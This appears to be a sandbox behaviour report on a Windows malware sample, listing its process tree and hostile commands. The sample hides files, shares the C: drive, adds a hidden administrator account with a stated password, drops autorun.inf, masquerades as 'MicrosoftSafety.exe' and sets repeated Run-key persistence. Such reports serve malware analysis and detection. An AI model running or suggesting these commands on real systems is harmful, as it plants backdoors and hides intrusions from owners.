PID 3204 wrote to memory of 904	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	108
PID 3204 wrote to memory of 904	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	108
PID 3204 wrote to memory of 4956	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	110
PID 3204 wrote to memory of 4956	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	110
PID 3204 wrote to memory of 4956	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	110
PID 3204 wrote to memory of 1784	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	111
PID 3204 wrote to memory of 1784	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	111
PID 3204 wrote to memory of 1784	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	111
PID 2072 wrote to memory of 4660	2072	cmd.exe	118
PID 2072 wrote to memory of 4660	2072	cmd.exe	118
PID 2072 wrote to memory of 4660	2072	cmd.exe	118
PID 3204 wrote to memory of 3680	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	115
PID 3204 wrote to memory of 3680	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	115
PID 3204 wrote to memory of 3680	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	115
PID 3204 wrote to memory of 3136	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	117

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1300	attrib.exe
3756	attrib.exe
4892	attrib.exe
1464	attrib.exe
1748	attrib.exe
1624	attrib.exe
4660	attrib.exe

C:\Users\Admin\AppData\Local\Temp\381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe
"C:\Users\Admin\AppData\Local\Temp\381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe"
1⤵
- Drops autorun.inf file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Users\Admin\AppData\Local\Temp\381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Users\Admin\AppData\Local\Temp\381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b /max .
  2⤵
  - Modifies registry class
  PID:4348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c tskill taskmagr
  2⤵
  PID:4288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net share SYS_C$=C:\
  2⤵
  PID:5028
- - C:\Windows\SysWOW64\net.exe
    net share SYS_C$=C:\
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 share SYS_C$=C:\
      4⤵
      PID:3908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd C:\ & del *.lnk
  2⤵
  PID:4168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File"
  2⤵
  PID:4524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File\Microsoft"
  2⤵
  PID:4596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe" "C:\Program File\Microsoft\MicrosoftSafety.exe"
  2⤵
  PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File"
  2⤵
  PID:4576
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File\Microsoft"
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File\Microsoft"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM
  2⤵
  PID:4888
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib -r -a C:\autorun.inf
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r -a C:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users /add SYS_4321 passPass
  2⤵
  PID:4708
- - C:\Windows\SysWOW64\net.exe
    net users /add SYS_4321 passPass
    3⤵
    PID:4592
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users /add SYS_4321 passPass
      4⤵
      PID:3708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users SYS_4321 passPass
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\net.exe
    net users SYS_4321 passPass
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users SYS_4321 passPass
      4⤵
      PID:3824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
  2⤵
  PID:904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net localgroup administrators /add SYS_4321
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators /add SYS_4321
    3⤵
    PID:1396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add SYS_4321
      4⤵
      PID:4248
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:3460
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r C:\autorun.inf
  2⤵
  PID:3644
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r C:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM\C0MM
  2⤵
  PID:216
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " %homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4092
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
  2⤵
  PID:636
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
    3⤵
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
  2⤵
  PID:460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
    3⤵
    PID:2392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4724
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1300
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2884
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3604
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4324
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2500
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:5088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3300
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:932
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3628
